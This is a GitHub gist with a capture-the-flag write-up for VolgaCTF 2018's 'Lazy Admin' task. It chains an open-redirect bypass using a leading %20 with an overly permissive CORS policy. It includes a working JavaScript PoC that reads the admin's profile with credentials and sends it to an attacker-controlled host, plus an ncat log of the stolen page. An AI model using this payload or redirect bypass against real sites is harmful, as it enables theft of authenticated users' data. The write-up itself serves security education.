Last active
March 25, 2018 17:00
-
-
Save pich4ya/17dd5ef496c8fb11b79f7e7ea40d601f to your computer and use it in GitHub Desktop.
VolgaCTF Quals 2018 - Lazy Admin Writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
Lazy Admin | |
This lazy admin has not authorized my account yet! Get his email, I want to write to him. | |
https://quals.2018.volgactf.ru/tasks | |
http://lazy-admin.quals.2018.volgactf.ru/ | |
http://lazy-admin.quals.2018.volgactf.ru/robots.txt | |
Disallow: /unauthorized_users.txt | |
http://lazy-admin.quals.2018.volgactf.ru/unauthorized_users.txt | |
Nick:BjnjjdGonhdkG@!lf | |
1. login and remove cookie | |
GET /profile.php HTTP/1.1 | |
Host: lazy-admin.quals.2018.volgactf.ru | |
Upgrade-Insecure-Requests: 1 | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 | |
Referer: http://lazy-admin.quals.2018.volgactf.ru/verify.php | |
Accept-Encoding: gzip, deflate | |
Cookie: PHPSESSID=o0274jdbh8nsroa8p9oa775dv2 <-- | |
Accept-Language: en-US,en;q=0.9,th;q=0.8 | |
Connection: close | |
HTTP/1.1 302 Found | |
[..] | |
Location: /?redir=/profile.php | |
2. open redirect protection in place | |
GET /?redir=http://www.google.com HTTP/1.1 | |
Host: lazy-admin.quals.2018.volgactf.ru | |
[..] | |
HTTP/1.1 200 OK | |
[..] | |
Redirect Error! | |
3. bypass open redirect with %20 | |
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf | |
GET /?redir=%20http://longcatnaja HTTP/1.1 | |
Host: lazy-admin.quals.2018.volgactf.ru | |
[..] | |
HTTP/1.1 302 Found | |
Date: Sun, 25 Mar 2018 10:29:43 GMT | |
Server: Apache/2.2.22 (Debian) | |
X-Powered-By: PHP/5.5.38-1~dotdeb+7.1 | |
Expires: Thu, 19 Nov 1981 08:52:00 GMT | |
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | |
Pragma: no-cache | |
Location: http://longcatnaja | |
[...] | |
4. exploit overly permissive cors | |
GET /verify.php HTTP/1.1 | |
[..] | |
Origin: http://ggez.com | |
HTTP/1.1 200 OK | |
[..] | |
Access-Control-Allow-Origin: http://ggez.com | |
Access-Control-Allow-Credentials: true | |
POST /verify.php HTTP/1.1 | |
Host: lazy-admin.quals.2018.volgactf.ru | |
Content-Length: 79 | |
Cache-Control: max-age=0 | |
Origin: http://lazy-admin.quals.2018.volgactf.ru | |
Upgrade-Insecure-Requests: 1 | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 | |
Referer: http://lazy-admin.quals.2018.volgactf.ru/verify.php | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en-US,en;q=0.9,th;q=0.8 | |
Cookie: PHPSESSID=o0274jdbh8nsroa8p9oa775dv2 | |
Connection: close | |
link=%2F%3Fredir%3D%2520http%3A%2F%2Flongcatnaja%3A8000%2Fggez.html&submit= | |
payload is shown below: | |
--> | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta name="author" content="Pichaya Morimoto"> | |
<title>Overly Permissive CORS Exploit PoC - Strictly Confidential</title> | |
<script> | |
var xmlhttp=new XMLHttpRequest(); | |
xmlhttp.open("GET","http://lazy-admin.quals.2018.volgactf.ru/profile.php",false); | |
xmlhttp.withCredentials = "true"; | |
xmlhttp.send(); | |
var url = "http://longcatnaja:1234/getdata.php?html=" + escape(xmlhttp.responseText); | |
xmlhttp.open("GET", url, true); | |
xmlhttp.send(); | |
</script> | |
</head> | |
<body> | |
<h1>LongCat</h1> | |
<pre id="content"></pre> | |
</body> | |
</body> | |
</html> | |
<!-- | |
root@sectest:~# ncat -lvp 1234 -k | |
Ncat: Version 7.60 ( https://nmap.org/ncat ) | |
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. | |
Ncat: SHA-1 fingerprint: 6268 F08D F34D 489A 8388 6936 16EF 6329 4C5F 93B7 | |
Ncat: Listening on :::1234 | |
Ncat: Listening on 0.0.0.0:1234 | |
Ncat: Connection from 82.202.212.170. | |
Ncat: Connection from 82.202.212.170:44467. | |
GET /getdata.php?html=%0D%0A%3C%21DOCTYPE%20html%3E%0D%0A%3Chtml%20lang%3D%22en%22%3E%0D%0A%20%20%3Chead%3E%0D%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0D%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3Dedge%22%3E%0D%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0D%0A%20%20%20%20%3C%21--%20The%20above%203%20meta%20tags%20*must*%20come%20first%20in%20the%20head%3B%20any%20other%20head%20content%20must%20come%20*after*%20these%20tags%20--%3E%0D%0A%20%20%20%20%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0D%0A%20%20%20%20%3Cmeta%20name%3D%22author%22%20content%3D%22%22%3E%0D%0A%20%20%20%20%3Clink%20rel%3D%22icon%22%20href%3D%22/assets/favicon.ico%22%3E%0D%0A%0D%0A%20%20%20%20%3Ctitle%3EStrict%20blog%3C/title%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20Bootstrap%20core%20CSS%20--%3E%0D%0A%20%20%20%20%3Clink%20href%3D%22/assets/css/bootstrap.min.css%22%20rel%3D%22stylesheet%22%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20IE10%20viewport%20hack%20for%20Surface/desktop%20Windows%208%20bug%20--%3E%0D%0A%20%20%20%20%3Clink%20href%3D%22/assets/css/ie10-viewport-bug-workaround.css%22%20rel%3D%22stylesheet%22%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20Custom%20styles%20for%20this%20template%20--%3E%0D%0A%20%20%20%20%3Clink%20href%3D%22/assets/starter-template.css%22%20rel%3D%22stylesheet%22%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20Just%20for%20debugging%20purposes.%20Don%27t%20actually%20copy%20these%202%20lines%21%20--%3E%0D%0A%20%20%20%20%3C%21--%5Bif%20lt%20IE%209%5D%3E%3Cscript%20src%3D%22../../assets/js/ie8-responsive-file-warning.js%22%3E%3C/script%3E%3C%21%5Bendif%5D--%3E%0D%0A%20%20%20%20%3Cscript%20src%3D%22/assets/ie-emulation-modes-warning.js%22%3E%3C/script%3E%0D%0A%0D%0A%20%20%20%20%3C%21--%20HTML5%20shim%20and%20Respond.js%20for%20IE8%20support%20of%20HTML5%20elements%20and%20media%20queries%20--%3E%0D%0A%20%20%20%20%3C%21--%5Bif%20lt%20IE%209%5D%3E%0D%0A%20%20%20%20%20%20%3Cscript%20src%3D%22https%3A//oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js%22%3E%3C/script%3E%0D%0A%20%20%20%20%20%20%3Cscript%20src%3D%22https%3A//oss.maxcdn.com/respond/1.4.2/respond.min.js%22%3E%3C/script%3E%0D%0A%20%20%20%20%3C%21%5Bendif%5D--%3E%0D%0A%20%20%3C/head%3E%0D%0A%0D%0A%20%20%3Cbody%3E%0D%0A%0D%0A%20%20%20%20%3Cnav%20class%3D%22navbar%20navbar-inverse%20navbar-fixed-top%22%3E%0D%0A%20%20%20%20%20%20%3Cdiv%20class%3D%22container%22%3E%0D%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22navbar-header%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22button%22%20class%3D%22navbar-toggle%20collapsed%22%20data-toggle%3D%22collapse%22%20data-target%3D%22%23navbar%22%20aria-expanded%3D%22false%22%20aria-controls%3D%22navbar%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22sr-only%22%3EToggle%20navigation%3C/span%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22icon-bar%22%3E%3C/span%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22icon-bar%22%3E%3C/span%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22icon-bar%22%3E%3C/span%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3C/button%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3Ca%20class%3D%22navbar-brand%22%20href%3D%22%23%22%3EStrict%20blog%3C/a%3E%0D%0A%20%20%20%20%20%20%20%20%3C/div%3E%0D%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22navbar%22%20class%3D%22collapse%20navbar-collapse%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3Cul%20class%3D%22nav%20navbar-nav%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cli%3E%3Ca%20href%3D%22/profile.php%22%3EProfile%3C/a%3E%3C/li%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cli%3E%3Ca%20href%3D%22/verify.php%22%3EVerify%3C/a%3E%3C/li%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cli%3E%3Ca%20href%3D%22/logout.php%22%3ELogout%3C/a%3E%3C/li%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%3C/ul%3E%0D%0A%20%20%20%20%20%20%20%20%3C/div%3E%3C%21--/.nav-collapse%20--%3E%0D%0A%20%20%20%20%20%20%3C/div%3E%0D%0A%20%20%20%20%3C/nav%3E%0D%0A%0D%0A%20%20%20%20%3Cdiv%20class%3D%22container%22%3E%0D%0A%0D%0A%20%20%20%20%20%20%3Cdiv%20class%3D%22starter-template%22%3E%0D%0A%20%20%20%20%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css%22%3E%0D%0A%3Cstyle%3E%0D%0A.card%20%7B%0D%0A%20%20box-shadow%3A%200%204px%208px%200%20rgba%280%2C%200%2C%200%2C%200.2%29%3B%0D%0A%20%20max-width%3A%20300px%3B%0D%0A%20%20margin%3A%20auto%3B%0D%0A%20%20text-align%3A%20center%3B%0D%0A%20%20font-family%3A%20arial%3B%0D%0A%7D%0D%0A%0D%0A.title%20%7B%0D%0A%20%20color%3A%20grey%3B%0D%0A%20%20font-size%3A%2018px%3B%0D%0A%7D%0D%0A%0D%0A.code%20%7B%0D%0A%20%20border%3A%20none%3B%0D%0A%20%20outline%3A%200%3B%0D%0A%20%20display%3A%20inline-block%3B%0D%0A%20%20padding%3A%208px%3B%0D%0A%20%20color%3A%20white%3B%0D%0A%20%20background-color%3A%20%23000%3B%0D%0A%20%20text-align%3A%20center%3B%0D%0A%20%20cursor%3A%20pointer%3B%0D%0A%20%20width%3A%20100%25%3B%0D%0A%20%20font-size%3A%2018px%3B%0D%0A%7D%0D%0A%0D%0Aa.icons%20%7B%0D%0A%20%20text-decoration%3A%20none%3B%0D%0A%20%20font-size%3A%2022px%3B%0D%0A%20%20color%3A%20black%3B%0D%0A%7D%0D%0A%0D%0A.code%3Ahover%2C%20a.icons%3Ahover%20%7B%0D%0A%20%20opacity%3A%200.7%3B%0D%0A%7D%0D%0A%3C/style%3E%0D%0A%3C/head%3E%0D%0A%3Cbody%3E%0D%0A%0D%0A%3Ch2%20style%3D%22text-align%3Acenter%22%3EUser%20Profile%20Card%3C/h2%3E%0D%0A%0D%0A%3Cdiv%20class%3D%22card%22%3E%0D%0A%20%20%3Ch1%3Eadmin%3C/h1%3E%0D%0A%20%20%3Cp%20class%3D%22title%22%3EVolgaCTF%7BclieNt_S1De_is_Awes0mEE_With_p@rse_Url%7D%3C/p%3E%0D%0A%20%20%3Cp%3ELazy%20admin%3C/p%3E%0D%0A%20%20%3Cdiv%20style%3D%22margin%3A%2024px%200%3B%22%3E%0D%0A%20%20%20%20%3Ca%20class%3D%22icons%22%20href%3D%22%23%22%3E%3Ci%20class%3D%22fa%20fa-dribbble%22%3E%3C/i%3E%3C/a%3E%20%0D%0A%20%20%20%20%3Ca%20class%3D%22icons%22%20href%3D%22%23%22%3E%3Ci%20class%3D%22fa%20fa-twitter%22%3E%3C/i%3E%3C/a%3E%20%20%0D%0A%20%20%20%20%3Ca%20class%3D%22icons%22%20href%3D%22%23%22%3E%3Ci%20class%3D%22fa%20fa-linkedin%22%3E%3C/i%3E%3C/a%3E%20%20%0D%0A%20%20%20%20%3Ca%20class%3D%22icons%22%20href%3D%22%23%22%3E%3Ci%20class%3D%22fa%20fa-facebook%22%3E%3C/i%3E%3C/a%3E%20%0D%0A%20%3C/div%3E%0D%0A%20%3Cp%3EYour%20verification%20code%3A%3C/p%3E%0D%0A%20%3Cp%3E%3Cdiv%20class%3D%22code%22%3EFhgNODNBSWKV%3C/div%3E%3C/p%3E%0D%0A%3C/div%3E%20%20%20%20%20%20%3C/div%3E%0D%0A%0D%0A%20%20%20%20%3C/div%3E%3C%21--%20/.container%20--%3E%0D%0A%0D%0A%0D%0A%20%20%20%20%3C%21--%20Bootstrap%20core%20JavaScript%0D%0A%20%20%20%20%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%20--%3E%0D%0A%20%20%20%20%3C%21--%20Placed%20at%20the%20end%20of%20the%20document%20so%20the%20pages%20load%20faster%20--%3E%0D%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js%22%3E%3C/script%3E%0D%0A%20%20%20%20%3Cscript%3Ewindow.jQuery%20%7C%7C%20document.write%28%27%3Cscript%20src%3D%22../../assets/js/vendor/jquery.min.js%22%3E%3C%5C/script%3E%27%29%3C/script%3E%0D%0A%20%20%20%20%3Cscript%20src%3D%22/assets/bootstrap.min.js%22%3E%3C/script%3E%0D%0A%20%20%20%20%3C%21--%20IE10%20viewport%20hack%20for%20Surface/desktop%20Windows%208%20bug%20--%3E%0D%0A%20%20%20%20%3Cscript%20src%3D%22/assets/ie10-viewport-bug-workaround.js%22%3E%3C/script%3E%0D%0A%20%20%3C/body%3E%0D%0A%3C/html%3E%0D%0A HTTP/1.1 | |
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1 | |
Referer: http://longcatnaja:8000/ggez.html | |
Origin: http://longcatnaja:8000 | |
Accept: */* | |
Connection: Keep-Alive | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en,* | |
Host: longcatnaja:1234 | |
^C | |
root@sectest:~# | |
VolgaCTF{clieNt_S1De_is_Awes0mEE_With_p@rse_Url} | |
--> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment